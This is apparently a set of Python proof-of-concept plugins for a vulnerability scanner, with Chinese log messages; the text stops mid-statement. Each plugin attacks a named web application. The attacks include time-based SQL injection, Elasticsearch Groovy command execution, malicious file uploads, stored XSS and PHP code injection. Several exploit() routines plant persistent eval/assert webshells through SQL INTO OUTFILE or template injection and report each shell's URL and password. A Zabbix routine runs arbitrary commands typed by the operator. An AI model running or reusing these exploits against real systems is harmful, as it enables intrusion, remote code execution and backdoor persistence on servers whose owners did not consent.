def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target payload1 = '''__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNTU4MTMwNTc4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgULY2JJc1JlbWViZXIFDEltYWdlQnV0dG9uMRgx6d11G2zzWntRDJIZph4YGLVfZouvWjmVDOX9030f&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEdAAdHo7ESDfB43eQm%2B%2BaON1gP9Tt6KoVd96dN6zOjIKoOlHY2%2BMc6SrnAqio3oCKbxYaDr609gOYlKV%2BbpnR3q6Cx6ZACrx5RZnllKSerU%2BIuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb%2Fp0Y6tcT3dZFQrnTSmlg62gf3LfDgkRp4YSzbmd%2Bkow%3D&txtUserID=admin&txtPassword=admin&ImageButton1.x=47&ImageButton1.y=3&hidFileldBrowserName=chrome44.0.2403.157&hidFileldBrowserShell=chrome%E6%B5%8F%E8%A7%88%E5%99%A8''' payload2 = '''__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNTU4MTMwNTc4D2QWAgIDD2QWAgIJDw8WAh4EVGV4dAUb55So5oi35Z CN5oiW5a+G56CB6ZSZ6K+v77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFC2NiSXNSZW1lYmVyBQxJbW FnZUJ1dHRvbjGUTVIt9MPbBGiuZg4jaDZnl7GGp6LqcBtLSKtVgDP4lw==&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARG ET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAAeUy/Z893jBDhlvaCCBA+8t9Tt6KoVd96dN6zOjIKoOlHY2+Mc6SrnAq io3oCKbxYaDr609gOYlKV+bpnR3q6Cx6ZACrx5RZnllKSerU+IuKsmrE4D3DRrem1MsGaBV0yK61SaGzux4XzPTjGFgzHLb10b6b QvRNPx/1qIXDYnt2YfQsDSjm01CMQ7LbBqb8j0=&txtUserID=admin';WAITFOR DELAY '0:0:5'--&txtPassword=admin&I mageButton1.x=47&ImageButton1.y=3&hidFileldBrowserName=chrome44.0.2403.157&hidFileldBrowserShell=chr ome%E6%B5%8F%E8%A7%88%E5%99%A8''' start_time = time.time() _response = requests.post(url, data=payload1) end_time1 = time.time() _response = requests.post(url, data=payload2) end_time2 = time.time() if (end_time1-start_time) - (end_time2-end_time1) > 5: self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) data1 = '''{"name": "csancsan"}''' r1 = requests.post( '{target}/website/blog/'.format(target=self.target), data=data1) head = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'application/json' } payload = {"size": 1, "script_fields": {"lupin": { "lang": "groovy", "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}} r2 = requests.post('{target}/_search?pretty'.format( target=self.target), headers=head, data=json.dumps(payload)) # print(r2.text) if 'uid' in r2.text and 'gid' in r2.text and 'groups' in r2.text: self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target # del passlog del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url requests.get(del_url) # submit code login_url = '%s/login.php?action=login&lonadmin=1' % url login_data = { 'loginuser': '******', 'loginpass': '******' } requests.post(login_url, data=login_data) # return page verify_url = '%s/data/log/passlog.php' % url content = requests.get(verify_url).text if 'cfcd208495d565ef66e7dff9f98764da' in content: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) testurl = urllib.parse.urljoin(arg, '/maxImageUpload/original/1.php') vulurl = urllib.parse.urljoin(arg, '/maxImageUpload/index.php') payload = { 'myfile': ('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>', 'image/jpeg') } data = {'submitBtn': 'Upload'} requests.post(vulurl, files=payload, data=data).text resp = requests.get(testurl) if '5a8adb32edd60e0cfb459cfb38093755' in resp: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # payload路径根据实际情况确定 # select '<?php echo md5(c)?>c' into outfile '/var/eyou/apache/htdocs/php/bill/script/index.php'; payload = '/php/bill/print_addfeelog.php' headers = {'Cookie': 'cookie=1;'} data = 'all_sql=c2VsZWN0ICc8P3BocCBlY2hvIG1kNShjKT8+YycgaW50byBvdXRmaWxlICcvdmFyL2V5b3UvYXBhY2hlL2h0ZG9jcy9waHAvYmlsbC9zY3JpcHQvaW5kZXgucGhwJzs=' url = self.target + payload requests.post(url, headers=headers, data=data) verify_url = self.target + '/var/eyou/apache/htdocs/php/bill/script/index.php' r = requests.get(verify_url) if '4a8a08f09d37b73795649038408b5f33' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # payload路径根据实际情况确定 # select '<?php echo md5(c); eval($_POST[c])?>c' into outfile '/var/eyou/apache/htdocs/php/bill/script/index.php'; payload = '/php/bill/print_addfeelog.php' headers = {'Cookie': 'cookie=1;'} data = 'all_sql=c2VsZWN0ICc8P3BocCBlY2hvIG1kNShjKTsgZXZhbCgkX1BPU1RbY10pPz5jJyBpbnRvIG91dGZpbGUgJy92YXIvZXlvdS9hcGFjaGUvaHRkb2NzL3BocC9iaWxsL3NjcmlwdC9pbmRleC5waHAnOw==' url = self.target + payload requests.post(url, headers=headers, data=data) verify_url = self.target + '/var/eyou/apache/htdocs/php/bill/script/index.php' r = requests.get(verify_url) if '4a8a08f09d37b73795649038408b5f33' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'. format(target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = "/?m=im&a=getDayRecord" url = self.target + payload data_sleep = "user_id=1' and 1=2 UNION SELECT sleep(10),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40#" data_normal = "user_id=1' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40#" time_start = time.time() requests.post(url, data=data_normal) time_end_normal = time.time() requests.post(url, data=data_sleep) time_end_sleep = time.time() if (time_end_sleep - time_end_normal) - (time_end_normal - time_start) > 9: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) payload = 'wp-content/plugins/simple-ads-manager/sam-ajax-admin.php' url = arg + payload post_data1 = 'action=load_posts&cstr==1&sp=Post&spg=Page' post_data2 = 'action=load_posts&cstr==1%27)%20AND%20SLEEP(5)%20AND%20(%27WhYm%27=%27WhYm&sp=Post&spg=Page' start_time1 = time.time() req1 = requests.post(url, data=post_data1) end_time1 = time.time() _req2 = requests.post(url, data=post_data2) if (req1.status_code == 200 or _req2.status_code == 200) and ( (time.time() - end_time1) - (end_time1 - start_time1)) > 5: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = '/FrogCMS-master/admin/?/page/edit/3' # 首先注册用户。 # 获取cookies cookies = {} raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e' for line in raw_cookies.split(';'): key, value = line.split('=', 1) # 1代表只分一次,得到两个数据 cookies[key] = value #print (cookies) data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close' url = self.target + payload requests.post(url, cookies=cookies, data=data) verify_url = self.target + '/FrogCMS-master/?about_us' r = requests.get(verify_url) if "<script>confirm(1234)</script>" in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 先注册一个帐号并登录,然后访问: # 获取cookies cookies = {} ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value ''' payload = "/admin.php?c=syscontroller&m=add&post=1" data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123" url = self.target + payload requests.post(url, cookies=cookies, data=data) verify_url = self.target + '/index.php?c=myndtt&m=index' r = requests.get(verify_url) if 'PHP Version' in r.text and 'System' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = ' /hdwiki/index.php?pic-search' headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36', } data_sleep = "searchtext=%E7%9B%B8%e9%8c%a6' UNION SELECT if(user()=user(),sleep(10),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7" data_normal = "searchtext=%E7%9B%B8%e9%8c%a6' UNION SELECT if(user()=user(),md5(c),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7" url = self.target + payload time_start = time.time() requests.post(url, data=data_normal) time_end_normal = time.time() requests.post(url, data=data_sleep) time_end_sleep = time.time() if (time_end_sleep - time_end_normal) - (time_end_normal - time_start) > 9: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target + "/web/member/memberSurveyAction!answerQuestion.do" headers = { "Content-Length": "2916", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Cookie": "JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1", "Connection": "Keep-alive", "Accept-Encoding": "gzip,deflate", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36", "Accept": "*/*" } payload = "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F" payload1 = "answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND 'Pesh'='hyhmnn&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&[email protected]&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F" _response = requests.post(url, data=payload, headers=headers) _response1 = requests.post(url, data=payload1, headers=headers) if _response.text != _response1.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36', 'X-FORWARDED-FOR': '221.179.180.156' } payloads = list('@abcdefghijklmnopqrstuvwxyz.0123456789') url = self.target + '/cpapi/qxtapi.php' data_sleep = "<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content><RecvTime>0'|sleep(5)#</RecvTime></Message></Body></aaaa>" data_normal = "<aaaa><Body><Message><SrcMobile>0</SrcMobile><Content>123123</Content><RecvTime>0'|sleep(0)#</RecvTime></Message></Body></aaaa>" time_start = time.time() requests.post(url, data=data_normal, headers=headers, timeout=3) time_end_normal = time.time() requests.post(url, data=data_sleep, headers=headers, timeout=3) time_end_sleep = time.time() if (time_end_sleep - time_end_normal) - (time_end_normal - time_start) > 4: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = '/cacti/graphs_new.php' url = self.target + payload data_sleep = "__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save" data_normal = "__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select md5(c))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save" time_start = time.time() requests.post(url, data_normal) time_end_normal = time.time() requests.post(url, data_sleep) time_end_sleep = time.time() if (time_end_sleep - time_end_normal) - (time_end_normal - time_start) > 4: self.output.report( self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url};具体请查看漏洞详情'.format( target=self.target, name=self.vuln.name, url=url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # payload根据实际情况确定 payload = '/webmail/client/pab/index.php?module=operate&action=contact-del' data_sleep = "contact_ids=-1) or sleep(5)%23" data_normal = "contact_ids=-1) or 1%23" url = self.target + payload time_start = time.time() requests.post(url, data=data_normal) time_end_normal = time.time() requests.post(url, data=data_sleep) time_end_sleep = time.time() if (time_end_sleep - time_end_normal) - (time_end_normal - time_start) > 4: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target + \ '/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct' timeout = 5 start_time = time.time() payload = { 'name': "wp_users WHERE 42=42 AND SLEEP({})--;".format(timeout) } _response = requests.post(url, data=payload) end_time1 = time.time() payload1 = {'name': "wp_users WHERE 42=42 AND SLEEP(5)--;"} _response = requests.post(url, data=payload1) end_time2 = time.time() if (end_time2 - end_time1) - (end_time1 - start_time) >= timeout: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def exploit(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 会在plus目录生成 x.php 密码 m # http://127.0.0.1/plus/x.php payload = "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35" url = self.target + payload requests.post(url) requests.get(self.target + '/plus/mytag_js.php?aid=1') url1 = self.target + '/plus/x.php' r = requests.get(url1) if r.status_code == 200: self.output.report( self.vuln, '发现{target}存在{name}漏洞,,已上传webshell地址:{url}密码为m,请及时删除。'. format(target=self.target, name=self.vuln.name, url=url1)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = "/index.php?m=vod-search" data = "wd={if-A:assert($_POST[c])}{endif-A}" url = self.target + payload requests.post(url, data=data) verify_url = url + '&wd={if-A:assert($_POST[c])}{endif-A}' verify_data = 'c=phpinfo()' r = requests.post(verify_url, data=verify_data) if 'PHP Verison' in r.text and 'System' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'. format(target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target + '/api_jsonrpc.php' login = '******' # Zabbix login password = '******' # Zabbix password hostid = '10084' # Zabbix hostid payload = { "jsonrpc": "2.0", "method": "user.login", "params": { 'user': ""+login+"", 'password': ""+password+"", }, "auth": None, "id": 0, } headers = { 'content-type': 'application/json', } auth = requests.post(url, data=json.dumps( payload), headers=(headers)) try: auth = auth.json() except: return cmd = eval(input('\033[41m[zabbix_cmd]>>: \033[0m ')) # update payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": "1", "command": ""+cmd+"" }, "auth": auth['result'], "id": 0, } cmd_upd = requests.post( url, data=json.dumps(payload), headers=(headers)) # execute payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": "1", "hostid": ""+hostid+"" }, "auth": auth['result'], "id": 0, } self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 获取网站绝对路径 document_root = '' payload = '/gxlcms/index.php?s=Admin-Index-phpinfo' url = self.target + payload r = requests.get(url) p = re.compile(r'DOCUMENT_ROOT\'\]</td><td class=\"v\">(.+)</td>') if p.findall(r.text): document_root = p.findall(r.text)[0] self.output.info('获取到网站绝对路径{}'.format(document_root)) # 上传文件 payload = '/gxlcms/index.php?s=Admin-Data-upsql' url = self.target + payload data = "sql=select '<?php phpinfo();echo md5(c)?>' INTO OUTFILE '{}/gxlcms/cscan.php';&submit=%E6%8F%90+%E4%BA%A4&hash=ab2af3933aa472eba3a25e8d69852e55".format( document_root) requests.post(url, data=data) verify_url = self.target + '/gxlcms/cscan.php' r = requests.get(verify_url) if '4a8a08f09d37b73795649038408b5f33' in r.text: self.output.report( self.vuln, 